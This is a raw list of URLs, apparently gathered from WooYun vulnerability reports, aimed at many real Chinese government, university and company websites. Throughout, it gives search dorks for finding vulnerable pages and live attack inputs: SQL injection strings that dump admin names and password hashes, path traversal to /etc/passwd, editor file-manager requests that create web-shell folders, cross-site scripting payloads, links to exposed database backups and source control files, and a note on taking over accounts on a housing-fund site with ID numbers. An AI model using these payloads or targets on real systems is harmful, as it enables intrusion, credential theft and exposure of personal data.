http://www.shkrsoft.com/ http://www.shkrsoft.com/yanshi/onlinetest.asp 
http://113.128.254.170:8088/OA/login.aspx http://113.128.254.170:8088/oa/erp/SelectObject/SelctProviderName.aspx http://www.jh.org.cn/plus/flink_add.php提交表单后截包,将exp加进去 http://www.fwzxshijiazhuang.gov.cn/FAQ/FaqLoading.aspx?id= inurl:TransactList.aspx?ItemName= http://60.211.195.50/Login/TransactList.aspx?ItemName=%27 http://www.e.lfang.gov.cn/LangChao.ECGAP.OutPortalZX/login/TransactList.aspx?ItemName= http://www.fwzxshijiazhuang.gov.cn/Broadcast/BroadcastVi http://www.fwzxshijiazhuang.gov.cn/login/Log.aspx?loginname= http://202.100.98.9/view.php?db=dongtai&id=5 https://github.com/loveymond/my-fw/blob/dc96463f33b63b4e66286778d58b3544bd0ebd41/application/helpers/smtp_helper.php inurl:fsmcms btgaj.gov.cn/fsmcms/sites/main/select.jsp?select_value=FJ_QS http://www.gujing.com:82/admin/upload.htm http://61.136.150.170:8090/main.aspx http://61.136.150.170:8090/default.aspx http://61.136.150.170:8090/user/user_info.aspx?id=14 http://61.136.150.170:8090/user/user_info.aspx?id=14 http://61.136.150.170:8090/user/user_info.aspx?id=14 http://61.136.150.170:8090/user/user_info.aspx?id=14 http://61.136.150.170:8090/user/user_info.aspx?id=14 http://oa.bnuz.edu.cn:8080/admin/login/logon.jsp https://www.google.com.hk/search?newwindow=1&safe=strict&es_sm=91&biw=1153&bih=634&q=intitle%3A%E5%A4%A9%E6%96%B9%E6%9C%89%E5%A3%B0%E6%95%B0%E5%AD%97%E5%9B%BE%E4%B9%A6%E9%A6%86&oq=intitle%3A%E5%A4%A9%E6%96%B9%E6%9C%89%E5%A3%B0%E6%95%B0%E5%AD%97%E5%9B%BE%E4%B9%A6%E9%A6%86&gs_l=serp.12...444855.444855.0.445405.1.1.0.0.0.0.0.0..0.0....0...1c.2.44.serp..1.0.0.8rqx6v7LP-I http://61.136.150.170:8090/user/user_history.aspx?id=14 http://61.136.150.170:8090/user/user_history.aspx?id=14 http://61.136.150.170:8090/user/user_history.aspx?id=14 http://www.pageadmin.net/ https://www.google.de/#newwindow=1&q=PageAdmin+CMS,++All+Rights+Reserved&start=90 http://www.youlu888.com/e/install/index.aspx 
http://www.youlu888.com/e/install/index.aspx?__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTExODcwMDU5OTgPZBYCAgEPZBYCAgMPFgIeB1Zpc2libGVoZGQ%3D&ctl02=%E8%BF%90%E8%A1%8CSQL http://www.e-tiller.com/ch/index.aspx inurl:first_menu.aspx、inurl:view_abstract.aspx http://jse.***.edu.cn/ch/guestbook/Login.aspx http://www.***.com.cn/ch/guestbook/Login.aspx http://www.***na.net/ch/guestbook/Login.aspx http://www.c***m.com.cn/ch/guestbook/Login.aspx http://xuebao.***.edu.cn/ch/guestbook/Login.aspx http://ahndskxb.***u.edu.cn/ch/guestbook/Login.aspx http://www.mod***dar.cn/ch/guestbook/Login.aspx http://www.dongfangtai.com/ http://www.51auto.com/ http://fengyun.kugou.com/news/list?cid=1311&page=2 https://github.com/binzh/sdpqa/blob/master/config/environments/production.rb https://github.com/liutaihua/cldisky/blob/master/t/readconf.py https://github.com/syshack/NeverMore/blob/master/zeus.wpu http://61.136.150.170:8090/user/user_admin.aspx http://wooyun.org/bugs/wooyun-2010-061673 http://61.136.150.170:8090/default.aspx http://wooyun.org/bugs/wooyun-2010-061673 http://61.136.150.170:8090/user/user_info.aspx?id=1 http://61.136.150.170:8090/user/user_forgetpwd.aspx data:text/html;base64,PHNjcmlwdD5hbGVydCgid29veXVufnRlc3QiKTwvc2NyaXB0Pg== http://tradeunion.tju.edu.cn/board.php?field=advice&id=93290 http://tradeunion.tju.edu.cn/board.php?field=ad http://www.youlu888.com/e/zt/ http://kf.sf-express.com/css/myquery/queryWQSBill.action# clsid:A38F2B9A-2DD3-4C88-86EE-15C01EB565EA http://bj.baidupcs.com/file/8afe498c9f126015a70ae0c3ce1a9b63?fid=3675168192-250528-678972838405721&time=1400665296&sign=FDTAXER-DCb740ccc5511e5e8fedcff06b081203-MfWZ2p8aIRiyTWAdPJp9n8qZ9fU%3D&to=bb&fm=N,B,U,nc&newver=1&expires=1400665896&rt=sh&r=805615569&logid=841455764&sh=1&vuk=3675168192&fn=ftpfuzz.exe https://github.com/walker01/sometools/blob/3755706e3b773d55225798283e0144e42fa5cc19/deploy/develope.log.md https://github.com/hengxingwuji/ http://www.xinpop.cn/) 
http://www.xinpop.cn/Customer_Example.html inurl:shownews.asp?newsid inurl:shownews.asp?id http://jwc.xinpop.com.cn/shownews.asp?pkId=103&newsid=1419 http://smesy.xidian.edu.cn/shownews.asp?newsid=1090 http://nec.snnu.edu.cn/shownews.asp?id=372 http://www.shanxi185.com/shownews.asp?id=1491 http://tiyubu.xpu.edu.cn/shownews.asp?id=417 inurl:asp site:edu.cn】 http://www.xsc.snnu.edu.cn/YuanBu_elegant_demeanour.asp?id=17&bh=10919 http://jw.xpu.edu.cn/Teachers_service.asp?id=20&bh=133 http://www.wyxy.snnu.edu.cn/News.asp?id=18&bh=114 http://biology.nwu.edu.cn/College_News.asp?id=25&bh=591 http://ysxy.nwu.edu.cn/News_Center.asp?id=137&bh=249 http://mainpage2.nwu.edu.cn/cjy/Dynamic_test.asp?id=38&bh=40 http://gzc.xidian.edu.cn/Download_Center.asp?bh=98&id=23 http://www.ibs.snnu.edu.cn/Student_worker_dynamic.asp?id=31&bh=816 http://math.xidian.edu.cn/The_News.asp?id=36&bh=155 http://sklsp.nwpu.edu.cn/Shiyanshi_News.asp?id=13&bh=95 http://jijianchu.snnu.edu.cn/Work_dynamic.asp?id=16&bh=298 http://whe.xaut.edu.cn/Notice.asp?id=25&bh=440 http://jwc.xinpop.com.cn/shownews.asp?pkId=103&newsid=1419 http://jwc.xinpop.com.cn/shownews.asp?pkId=103&newsid=1419 http://smesy.xidian.edu.cn/shownews.asp?newsid=1090 http://smesy.xidian.edu.cn/shownews.asp?newsid=1090 http://service.weibo.com/share/share.php?url=http://127.0.0.1:80 lwjs.kugou.com/news/list?cid=1343 http://www.hb-n-tax.gov.cn/为国税局主页。 http://219.140.162.53:8001/website/downloadcenter.htm?method=getMore&wjlxDl=2 http://www.74cms.com/ Version:V4.5 www.zjyzkf.com/_jbrcms/%23JbrCMSDB/%23JbrData.mdb http://publish.tju.edu.cn/showMessage.do?method=showMessage&article_id=1143 http://jxsjjx.tju.edu.cn/news/CodeIgniter/tianda.php?d=front&c=fileshow&m=filedetail&id=25 http://mse.tju.edu.cn/content.php?block=a1 http://gs.tju.edu.cn/yjspy/py2013/kc_list.asp?xydm=117 http://gs.tju.edu.cn/zyb/news_detail.asp?id=808 http://gs.tju.edu.cn/xw/readnews.asp?NewsID=271 http://gs.tju.edu.cn/xw/ywjd/Readyw.asp?NewsID=30 http://salon.yonyou.com 
http://salon.yonyou.com/AppWeb/FuWuCP/FuWuCP_list.aspx?BianHao=AUTON060628000002 http://salon.yonyou.com/AppWeb/FuWuCP/FuWuCP_list.aspx?BianHao=AUTON060628000002%20and%201=1 http://salon.yonyou.com/AppWeb/FuWuCP/FuWuCP_list.aspx?BianHao=AUTON060628000002%20and%201=2 http://health.yonyou.com/readme.txt http://health.yonyou.com http://health.yonyou.com/ok.php http://www.diancms.com/Model/10.aspx http://www.5156yuwen.com/user/login.aspx https://github.com/mayhope/diaoyu/blob/01cf9eae8ada01a02469a8f3a8c93469bedc4188/libs/model/BaseModelMailer.php https://github.com/topweibo/master/blob/1d739aa16297af932c36a50f8433feda31074c5a/common/weibo.py http://demo.idcsystem.net/server.html?pg=0 http://demo.idcsystem.net/server.html?pg=0 http://www.sqlmap.org https://www.google.com.hk/search?q=inurl:Course_List.aspx?typeid= http://shop2.pmway.com/Goods/Search.aspx?isTop=true&searchValue=dudu http://www.0370edu.com/wap/index.php?mod=store&userid=chunmiao http://demo.vbmcms.com/wap/index.php?mod=store&userid=chunmiao http://demo.vbmcms.com/wap/index.php?mod=store&userid=chunmiao http://www.sqlmap.org www.youyax.com/download.php www.youyax.com/download.php?name=../../../../../../../../../../etc/passwd www.youyax.com/download.php?name=../../../../../../../../../../etc/resolv.conf www.youyax.com/download.php?name=../index.php http://www.hbxzzx.gov.cn/admin/login.jsp,如图 http://125.35.5.6:9000/ http://demo.ssfall.com/ads.asp?ad=8 http://demo.ssfall.com/ads.asp?ad=8 http://www.sqlmap.org http://www.zzeq.gov.cn:803/cn/login.html inurl:Column.aspx?ColId=2 http://chem.jlu.edu.cn/chemistry/science.php?id=103&&cid=4 inurl:TransactList.aspx?ItemName= http://moffice.wo.com.cn/shop_show.php?MenuID=2&CaseID=7 inurl:TransactList.aspx?ItemName= http://tieba.baidu.com/f/commit/share/openShareApi?url=http://www.wooyun.org/ http://sba.ahu.edu.cn/db.rar http://www.bjgjj.gov.cn/wsyw/wscx/gjjcx-edit.jsp直接去修改默认密码,就可以通过身份证号去登陆了,需要通过GET提交bh参数,值其实就是身份证号+00 
http://www.bjgjj.gov.cn/wsyw/wscx/modfy.jsp?bh=MTEwMXXXXXXXXXXEyMDg2MTQ2MDA= http://www.bjgjj.gov.cn/wsyw/wscx/gjjcx-edit.jsp?bh=MTEwMXXXXXXXXXXEyMDg2MTQ2MDA= http://www.bjgjj.gov.cn/wsyw/wscx/modfy.jsp?bh=MTEwXXXXXXNDEyMDg2MTQ2MDA= http://www.bjgjj.gov.cn/wsyw/wscx/js/Encrypt.js http://niclab.bupt.edu.cn/ http://niclab.bupt.edu.cn:8080/article/boot_index.php http://www.meilishuo.com/activity/tuan/tg512/?event_id=1015 http://mapp.meilishuo.com/activity/tuan/tg512/?event_id=1015 site:bbs.kaspersky.com.cn inurl:profile http://preorder.smartisan.com/ http://share.*.taobao.com/share/addShare.htm?title=&url=http://www.wooyun.org https://github.com/chengang/tmpWorks/blob/master/inotify.pl http://mas.cipg.org.cn/serverLog.do http://221.178.218.122:8001/serverLog.do http://221.178.131.250/serverLog.do http://wd.koudai.com/vshop/1/H5/H5ShopInfo.php?userid=52&callback=jsonpcallback_1400737639575_8703400159720331&ver=51402 http://www.globenuist.cn/admin/AdminLogin.html https://114.80.121.120 http://www.yx667.com/(攸县生活网) http://www.hnyxrk.com/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx http://www.hnyxrk.com/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Media&CurrentFolder=%2Fshell.asp&NewFolderName=z http://www.hnyxrk.com/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx http://www.hnyxrk.com/upload/Media/shell.asp/20142722042707.jpg http://mail.xxx.com/webmail/getPass.php?email=Services@xxx.com&update=s http://mail.comingchina.com/webmail/getPass1.php?email=umailtry@comingchina.com&update=s http://mail.comingchina.com/webmail/getPass2.php?email=umailtry@comingchina.com&update=s http://tsw.lhk.gov.cn/ http://210.22.8.98/dwr/call/plaincall/DwrUserInfo.resetPassword.dwr?callCount=1&page=/forgot.action&httpSessionId=&scriptSessionId=1400608260581&c0-scriptName=DwrUserInfo&c0-methodName=resetPassword&c0-id=0&c0-param0=string:1111'&c0-param1=string:111@11.com&batchId=0&locale=zh_CN AdminID:Name:Password:RoleId 
Account:AppServerID:AppServerSN:AppServerType:AssignFlag:Capacity:Password:RecycleDay ServerID:UserID:UserName http://www.soft.u7pk.com/User_bbs.html http://www.njsdyyy.com/admin/login.jsp http://dynamic.app.m.letv.com/android/dynamic.php?starttime=&endtime=&deptid=&productid=&username=123456&act=queryrecord&ctl=index&day=0&mod=passport&pid=&pcode=010110329&query=02&version=5.0 http://www.changedu.com/ http://sy.cxxy.seu.edu.cn/这个为例 http://sy.cxxy.seu.edu.cn/syjx/index.aspx登录帐号入口 http://sy.cxxy.seu.edu.cn http://localhost/Sys/FrameWork/PlatForm/RemoteMethodCall.aspx http://localhost/index.aspx?events=logon¶meter=OA http://localhost//Sys/ExtControl//fckeditor//editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684 http://localhost/Sys/ExtControl/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://localhost/Sys/ExtControl///fckeditor//editor/filemanager/connectors/aspx/connector.aspx http://mail.ggv.com.cn/login.php?Lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00.php http://vip.hn118114.cn/locallife.aspx?T=wooyun http://vip.hn118114.cn/zhinan.aspx?Name=wooyun http://vip.hn118114.cn/locallife.aspx?T=wooyun http://home.inc.hc360.com/homenew/Home/View.aspx?Id=3980 http://www.ahhbly.gov.cn//main/model/newsoperation/webEditor/eWebEditor.jsp http://www.aqanhuisafety.gov.cn/main/model/newsoperation/webEditor/eWebEditor.jsp http://www.we7.cc/源码下载,量还是挺大的。验证为v0.52,漏洞应该是版本通杀。 http://bbs.we7.cc/forum.php?mod=viewthread&tid=1155 http://live.sports.ifeng.com/sports/schedule.php?format=js&matchids=“ http://live.sports.ifeng.com/sports/schedule.php http://sqlmap.org http://www.ifeng.com http://health.sxws.gov.cn/yypt/wsyygh/digitalPlatform.action http://jthkkcx.cic.tsinghua.edu.cn/hkjy.hkgl_hkjy.do http://www.laanhuisafety.gov.cn/main/model/newsoperation/webEditor/eWebEditor.jsp http://sakai.hhu.edu.cn/portal 
http://elearning.ujs.edu.cn/portal https://urp.swu.edu.cn/index.portal http://sakai.ynni.edu.cn/portal http://sakai.fudan.edu.cn:8080/portal http://sakai.sysu.edu.cn/portal http://sakai.umji.sjtu.edu.cn/portal http://cas.sias.edu.cn/portal http://chongqing.buynow.com.cn http://www.haitiansoft.com/default.asp http://oa.haitianoa.com/login.asp http://oa.haitianoa.com/login.asp http://www.fzsyxx.com/oa/ http://vos.tjufe.edu.cn/login.asp http://wooyun.org/bugs/wooyun-2010-049502 http://www.a.com/www.sohu.com/来绕过防御 http://www.haotianaobo.com/cases.aspx http://oademo.haotianaobo.com/ site:gov.cn http://job.10000114.com/shantou/jobinfo.aspx?uid=34354&city=1 http://gs.tju.edu.cn:8088/tuimian/ http://220.178.4.169/open/PyfaList.aspx?xsfl=22 http://www.xmhlkj.gov.cn/file/index.asp http://www.xmhlkj.gov.cn/z.aspx http://www.xmhlkj.gov.cn/ManageModule/Info/fckeditor http://www.fj.bnet.cn/Page/Tool.aspx http://117.27.135.242:8080/chanjet/do/taxlogin.php http://59.57.4.233:7080/icity.fj/ http://219.242.65.10/fsweb/HotBrowse.aspx?Call=E google:http://74.125.235.191/#newwindow=1&q=inurl:%2FHotBrowse.aspx http://opac.syphu.edu.cn:8080/HotBrowse.aspx?Call=k http://lib.sccm.cn:888/gdweb/HotBrowse.aspx?Call=b http://lib.xjnu.edu.cn:8000/HotBrowse.aspx?Call=B http://210.40.8.35:8080/HotBrowse.aspx?Call=E http://222.77.99.242:8088/HotBrowse.aspx?Call=TU http://119.7.***.***:9090/monitor/[2014-5-22]/059188388106-059188051023-1400752162.1835-174923.wav http://www.qixian.gov.cn/gcjs/Download.asp?ID=39 http://drops.wooyun.org/tips/2031说的问题很清楚我也不重复了,乌云的几个上传好像都没做文件内容的检查 http://www.baidu.com/www.wooyun.org/就成功了 http://www.wooyun.org/teams/(选这个没别的理由,就因为页面内容少。。速度快一点 www.wooyun.org的目录 http://xxx.com/www.wooyun.org/csrf.html丢到zone http://www1.gdufs.edu.cn/gwkyc/DownloadShow.asp?ID=17 http://supports.house.sina.com.cn/decor/2007 http://www.topsi.net.cn/ http://www.topsi.net.cn/case.php http://www.h***o.co/ http://www.c***n.com http://www.s***ng.com http://www.k***.gov.cn http://hefeng.***61.com 
http://www.m***ie.com.cn http://fy2.scctcm.edu.cn/DownloadShow.asp?ID=60 http://www.csjjcgs.cn/xxgl/tzgg_view.jsp?xh=321 http://www.csjjcgs.cn/xxgl/zcfg_view.jsp?xh=39 http://campus.chinaunicom.cn/ilearn/en/learner/jsp/login.jsp http://service.hunaniptv.com/zentaopms/www/index.php?m=user&f=login&referer=L3plbnRhb3Btcy93d3cv http://www.hbhggh.gov.cn/admin/login.aspx http://paoscholarship.zju.edu.cn/ggp_content.jsp?id=44 http://www.bjlqzx.com/ http://yto.21tb.com/ http://www.coolyi.net/khal/ inurl:nid= http://www.xuhuicable.com/news_list.asp?nid=16 http://www.sjzanfang.com/prod.asp?nid=18 http://www.sjzhaohan.com/products.asp?nid=4 http://lcqfgg.com/show.asp?unid=42&nid=10 http://wooyun.org/bugs/wooyun-2010-053107 http://xxx.gov.cn/riseapprove_web/sencondPage/moreResultFormulaxg.do?depNO=JS061200FG&nowPage=331 http://74.125.235.191/#newwindow=1&q=inurl:riseapprove_web http://222.184.252.158:9080/riseapprove_web/sencondPage/moreResultFormulaxg.do?depNO=JS061200FG'&nowPage=331 http://58.221.162.227:9080/riseapprove_web/sencondPage/moreResultFormulaxg.do?depNO=JS061200FG'&nowPage=331 http://zwdt.tz.gov.cn/riseapprove_web/sencondPage/moreResultFormulaxg.do?depNO=JS061200FG'&nowPage=331 http://58.221.232.44:9080/riseapprove_web/sencondPage/moreResultFormulaxg.do?depNO=JS061200FG'&nowPage=331 http://id.sspu.edu.cn:8888/uid/forget http://id.sspu.edu.cn:8888/uid/forget http://222.66.97.103:8080/CEAEC/rule/loginAction_sentValidateCode.do http://www.nblife.com/test.aspx http://www.nblife.com/news/news.aspx?id=2 http://www.nblife.com/news/news.aspx?id=2 http://www.sqlmap.org www.nblife.com\session http://www.nblife.com:80/404.htm http://218.205.252.22:8080/bzwcity/wap/welcome.action?phone= http://60.30.83.134:8088/govAManage.do?type=zcfg_info&id=Pol2013050813460721&index=1 http://60.30.83.134:8088/govAManage.do?type=zcfg_info&id=Pol2013050813460721&index=1 http://60.30.83.134:8088/govAManage.do?type=zcfg_info&id=Pol2013050813460721&index=1 
http://60.30.83.134:8088/govAManage.do?type=zcfg_info&id=Pol2013050813460721&index=1 http://wapah.189.cn/ http://zyxw.jlu.edu.cn/manage/topic_list.php?cid=135 http://ywc.jlu.edu.cn/modue/contentTemplate.php?id=1382 http://ywc.jlu.edu.cn/modue/contentTemplate.php http://xiaobao2.jlu.edu.cn/read.php?id=66 http://www.bjhmoh.cn/index.php?r=archives/video/list&id=162 http://mail.**.edu.cn IP:210.39.*** Time:2014.05.24 x55.me/ref.php user:proxyGet&sid=BARrNLUUUlAwDLwyDaUUqmrWcdUAhYrj&mid=1:1tbiAQAOBVC9aUS31AAEst&url=%2Fcoremail%2FXJS%2Fimages%2Fing_yellow.gif http://x55.me/ref.php http://baolai.hz.letv.com/php/balaiadd.php http://tv.tsinghua.edu.cn/mcms/?p=2742 http://www.bysj.zjut.edu.cn/train/login http://www.iwoshare.com/getFriendsByUser/1 http://vshare.wo.com.cn/ http://202.204.213.10/gerenzhuye.php?user_id=140 http://zdb.anyang.gov.cn/DownloadShow.asp?ID=25 http://dir.minigame.qq.com/cgi-bin/QQGame_RichPayerInfo/get_player_info?callback=mm_callback&uin= http://oa.letv.com/ http://www.soyun.org/cha_api.php?so=letv.com&auto= http://sports.m.letv.com/sports/basketballTable/create?match_type=230 http://service.js.10086.cn/act_js/activity_web/1255/index.html#home http://joyearcars2014happy.hz.letv.com/ http://joyearcars2014happy.hz.letv.com/php/joyearcar.php?callback=jQuery17106190212650690228_1400858346260&username=wooyun&tel=18688888888&email=wooyun@126.com&chex=%E6%99%AF%E9%80%B8SUV&prav=%E4%B8%8A%E6%B5%B7&city=%E4%B8%8A%E6%B5%B7&addre=%E4%B8%8A%E6%B5%B7%E4%B8%9C%E4%BB%AA%E6%B1%BD%E8%BD%A6%E8%B4%B8%E6%98%93%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8&_=1400858382500 http://www.tcom.gov.cn/siteserver/CMS/console_tableMetadata.aspx?ENName=cms_Content&TableType=BackgroundContent http://www.tcom.gov.cn//siteserver/cms/modal_contentGroupAdd.aspx?PublishmentSystemID=2222&GroupName=123%27%20and%201=@@version%20and%201=%271 http://www.tcom.gov.cn/qd/default.asp http://www.tyut.edu.cn/211/DownloadShow.asp?ID=85 http://www.scxd.gov.cn/index.do 
http://219.239.44.26/UDS/Views/Home/Index.aspx, http://www.taodocs.com/p-3099622.html http://lib.ncu.edu.cn/readerservice/lib_news.asp?n1=10 http://supramol.jlu.edu.cn/Categories.php?id=1 http://phy60.jlu.edu.cn/categories.php?id=3 http://phy60.jlu.edu.cn/categories.php?id=3 http://bgs.tsu.edu.cn/db/DownloadShow.asp?ID=3 http://xsc.zhjnc.edu.cn/DownloadShow.asp?ID=16 http://mba.jlu.edu.cn/newmba/dean_speech.php?sid=215 http://jmyq.buct.edu.cn/www/DownloadShow.asp?ID=90 http://zcc.hnfnu.edu.cn/DownloadShow.asp?ID=64 http://218.60.146.180:9090/monitor/apoList.do?formAction=search&type=1 http://mach.jlu.edu.cn/hb_images/zsxx/zsxx.php?id=1 http://mach.jlu.edu.cn/hb_images/zsxx/zsxx.php http://mach.jlu.edu.cn/hb_images/zsxx/zsxx.php http://biz.finance.sina.com.cn/search/dict/search.php?sp_ns=o http://oneplusbbs.com/home.php?mod=task&do=view&id=1 http://oneplusbbs.com/home.php?mod=task&do= http://phy.jlu.edu.cn/admin/showimg.php?tablename=cms_article&id=921&fieldprefix=imgnews http://phy.jlu.edu.cn/admin/showimg.php?tablena http://phy.jlu.edu.cn/admin/showimg.php?tablena http://zj.tobacco.gov.cn/wzzyz/.svn/entries http://kjcg.jlu.edu.cn/pages/kjdjxx/read.aspx?id=55 http://blog.sina.com.cn/u/3974702777 http://t1.lizhi.fm/ http://t1.lizhi.fm/t1.php http://art.jlu.edu.cn/jxgz_c.php?file_id=1178 http://218.26.173.92/baoming/zjy/DMleft.asp http://218.26.173.92/zjysys/zjy/DMTable.asp?tableName=INFOLIB http://chemlab.jlu.edu.cn/2006/index.php?M=index&F=chemlab&itemId=4&id=1 http://www.techbridge-inc.com/ http://x55.me/geo.htm http://58.30.53.227:9080/login.action http://58.30.53.227:9080/Silic.jsp http://www.baidu.com/s?wd=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%EF%BC%9A56628124%2056626870 http://ps.imau.edu.cn/anmai/login.aspx http://koubei.baidu.com/未对要查看的网站域名过滤导致存在反射性跨站。 http://koubei.baidu.com/s/www.google.com/';test=123;a= http://bbs.yy.com/home.php?mod=task&do=delete&id=3 http://bbs.yy.com/home.php?mod=task&do=draw&id=3 http://www.jiankongbao.com/server-status 
http://110.167.122.138:8080/login/corp.action http://110.167.122.138:8080/Silic.jsp http://113.140.70.184:4023/sxpt/index.action http://www.smdx.gov.cn/FCKeditor http://www.sogou.com/sogou?query=%27%2Balert%28document.cookie%29%2B%27&ie=utf8&_ast=1400934144&_asf=null&w=01029901&pid=sogou-netb-5dc126b503e374b0-8537&duppid=1&p=40040702&dp=1&cid=null&sut=2967&sst0=1400934101229&lkt=0%2C0%2C0 http://www.600280.com:81/login.action http://wwwb.swufe.edu.cn/oa_18/info/dtxxdetail.asp?dept=062&dtime=2014/05/22%2016:59:05&dtnum=1 http://sgyjzx.swufe.edu.cn/researchcontent.asp?id=6 http://sgyjzx.swufe.edu.cn/newscontent.asp?id=166 http://sgyjzx.swufe.edu.cn/recruitmentcontent.asp?id=14 http://sgyjzx.swufe.edu.cn/exchangecontent.asp?id=13 http://m.jinjianginns.com/user/login?phone=&tip=%E7%99%BB%E5%BD%95%E4%B9%8B%E5%90%8E%E6%89%8D%E8%83%BD%E6%9F%A5%E7%9C%8B%E4%BC%98%E6%83%A0%E5%88%B8%2C%E8%AF%B7%E5%85%88%E7%99%BB%E5%BD%95~&channel=HOTELVP_JJZX_WAP http://www.hasee.com/cn/NewsWindow_Index.html?datetime=2014*&newswindow=selectdate http://dzb.hasee.com/english/products/showpicture.asp?ud=16&id=661 http://www.ccgp-jiangxi.gov.cn/jsp.jsp http://www.jxzfcg.gov.cn/ http://www.bloody.tw/ru/ru.rar http://www.qd.sdu.edu.cn/guestbook/index.php http://demo.songcms.com/?m1/fnews/l/w%33%36%30%25%27%29%20%61%6E%64%20%31%3D%32%20%55%4E%49%4F%4E%20%53%45%4C%45%43%54%20%31%2C%32%2C%33%2C%63%6F%6E%63%61%74%28%75%73%65%72%28%29%2C%30%78%37%63%2C%64%61%74%61%62%61%73%65%28%29%29%2C%35%2C%36%2C%37%2C%38%2C%39%2C%31%30%2C%31%31%2C%31%32%2C%31%33%2C%31%34%2C%31%35%2C%31%36%23 inurl:Admin/pass/login.asp http://61.186.207.8/ScientificResearch/login/login.jsp http://222.177.23.155:9002/result cn:8088 http://uems.sysu.edu.cn/jwxt/ www.dghyjz.com www.hongqingzhi.com www.shengxianmj.com www.kebian.net www.xinpeng168.com www.dgxyyq.net www.gddspjs.com www.0769xs.net www.hsfzy.com www.dgjianlifz.com www.dgdezheng.com www.juxingyp.com www.15818366850.com www.dgrjzy.com www.tianfeng666.com www.dgsanduo.com 
www.szbafwgs.com www.dghkbz.com www.shifeng-china.com www.dgqyzc.com www.wonderachem.com www.jilongjixie.com www.aubiter.com www.guanshenhuagong.com www.dongjun2000.com www.dgqifei.com www.gdfeiyu.com www.xqjx100.com www.haoyutest.com www.dgddjt.com www.shunyuanjc.com www.0769huixin.com www.dgyinfa.com www.0769liangfa.com www.keqin88.com www.cppdg.com www.wanyangxc.com www.dgfs68.com http://*web*/upfileform.asp http://www.sbc-usst.edu.cn/search.asp http://www.ytl360.com/dede/ http://www.ytl360.com/uploads/a.php http://fytz.njnu.edu.cn/7.tzdt/small.asp?newsid=763 https://github.com/zengjianjay/alizycg/blob/1cae1988a2dd0f5dce6ce815529030ce122ed4bc/config/application.rb http://alibaba-inc.com https://l***a-inc.com/***=kelude http://k.alibaba-inc.com http://k.alibaba-inc.com/admin/machines http://k.alibaba-inc.com/****/machine_list.htm http://nxlwtv.com.cn http://wooyun.org/bugs/wooyun-2014-059954 loader:URLLoader http://www.haicang.gov.cn:106/ http://www.haicang.gov.cn:106/adm/index.asp http://222.76.226.100:106/doc/news_201452513192.asp http://218.17.55.108:8081/api http://218.17.55.108:100/ http://218.17.55.108:100/admin/home/即可操作管理员账户,密码也是明文的。 fengjing.com/fengjing123 http://localhost/maccms8/admin/?m=template-list-path-../template/ http://www.lhjy.gov.cn/tabledownload/download.jsp?url=Dredboy5711%5Cweblh%5Cwebapp-lh%5Ctabledownload%5C&id=&filename=download.jsp http://www.zjdeqing.lm.gov.cn/tabledownload/download.jsp?url=Dredboy5711%5Cdqwebnew%5Cwebapp-dq%5Ctabledownload%5C&id=&filename=download.jsp http://www.lhrlzyw.com/tabledownload/download.jsp?url=Dredboy5711%5Cweblh%5Cwebapp-lh%5Ctabledownload%5C&id=&filename=download.jsp http://www.dqlm.com/tabledownload/download.jsp?url=Dredboy5711%5Cdqwebnew%5Cwebapp-dq%5Ctabledownload%5C&id=&filename=download.jsp http://www.fzjob.net:9090/tabledownload/download.jsp?url=Dredboy5711%5Cjxfzweb%5Ctabledownload%5C&id=&filename=download.jsp 
http://demo.74cms.com/plus/ajax_common.php?act=hotword&query=錦'union+select+1,group_concat%28admin_name,0x3a,pwd,0x3a,pwd_hash%29,3+from+qs_admin%23 http://demo.74cms.com/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27union+/*!50000SeLect*/+1,group_concat%28admin_name,0x3a,pwd,0x3a,pwd_hash%29,3+from+qs_admin%23 http://piwik.tutuso.cn:9200 http://stud.hqu.edu.cn/xscgz/ok/qicais.asp?id=7840 http://m.t3.com.cn/quickReg http://m.t3.com.cn/?x=pIjFRSCVrVAvT0WlsseHTw http://m.t3.com.cn/index http://test.data.ent.sina.com.cn/ http://test.data.ent.sina.com.cn/movie/23636 https://www.google.com.hk/webhp?hl=zh-CN&sourceid=cnhp#hl=zh-CN&newwindow=1&q=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81:%E6%96%B0%E5%8A%BF%E5%8A%9B%E7%BD%91%E7%BB%9C&safe=strict http://jw.xpu.edu.cn/Notices.asp?id=26&bh=174 http://cw.xaut.edu.cn/Notice_and_Announcement.asp?id=12&bh=233 http://zfgaxy2012.nwupl.cn/Colleage_news.asp?id=13&bh=241 http://hqjt.xidian.edu.cn/News_center.asp?id=19&bh=556 http://zwc.xauat.edu.cn/General_Dynamic.asp?id=14&bh=209 http://www.kanchufang.com:9200/ http://17wo.cn/ForgetPassword.action http://17wo.cn/FlowRedPacket!enterSendFlowRedPacket.action?pageName=sentdirect http://17wo.cn/FlowRedPacket!sendRedPacketList.action http://space.yaolan.com/****你的ID****/share http://u9service.ufida.com.cn/servicehome/kmview.aspx?postid=ZS20130408008 http://www.epiaogo.com/ http://www.epiaogo.com/bus/pay.html?TradeCode=xxxxxxxxx http://buy.modernsky.com/index.php?controller=ucenter&action=order_detail&id=296 https://220.181.46.210//js/kindeditor/php/file_manager_json.php?path=/ http://zt.chevip.com/jingpin/content.php?id=62 http://zt.chevip.com/jingpin/?cateid=2 https://github.com/joey-he8x/ytpp_app/blob/f5af1e315c60ffca312c86f104c988feb9dbe95f/config/ldap.yml https://github.com/joey-he8x/ytpp_app/blob/2d06ea39da60be1ffd892511746b5bc141296971/app/views/index/index.html.erb 
